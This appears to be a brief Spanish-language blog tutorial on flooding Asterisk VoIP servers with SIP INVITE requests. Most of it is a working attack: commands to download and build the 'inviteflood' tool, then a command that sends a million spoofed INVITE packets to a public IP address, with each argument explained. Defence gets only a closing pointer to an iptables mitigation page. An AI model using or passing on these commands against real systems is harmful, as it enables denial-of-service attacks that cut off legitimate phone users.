Ataques sip inviteflood a un Asterisk
En realidad este no es un concepto nuevo, siempre ha existido y mas por la deficiencia del protocolo sip que por el tipo de plataforma. El método consiste en explotar una vulnerabilidad del protocolo SIP , haciendo un envio masivo de peticiones INVITE de esta forma :
Instalación de la herramienta inviteflood
#wget http://www.hackingvoip.com/tools/inviteflood.tar.gz
#tar xvfz inviteflood.tar.gz
#cd inviteflood
#make
Enviar paquetes
# ./inviteflood eth0 5104 192.168.0.2 184.106.134.177 1000000 -a hacker -D 5071 -v
interfase de envío : eth0
Extension enviada : 5104
Ip origen : 192.168.0.2
Ip destino : 184.106.134.177
Cantidad de paquetes enviados : 1000000
User Alias : hacker
– D : puerto de destino
-v : Nivel de verbosidad
Hacia Asterisk. El comportamiento seria de esta forma :
Esto causa una denegación de servicio hacia los sip client validos , lo cual es sumamente peligroso
Que hacer para contrarrestar este tipo de ataque ? , hay muchas técnicas , sin embargo la mas efectiva es usando iptables :
http://etel.wiki.oreilly.com/wiki/index.php/SIP_DoS/DDoS_Mitigation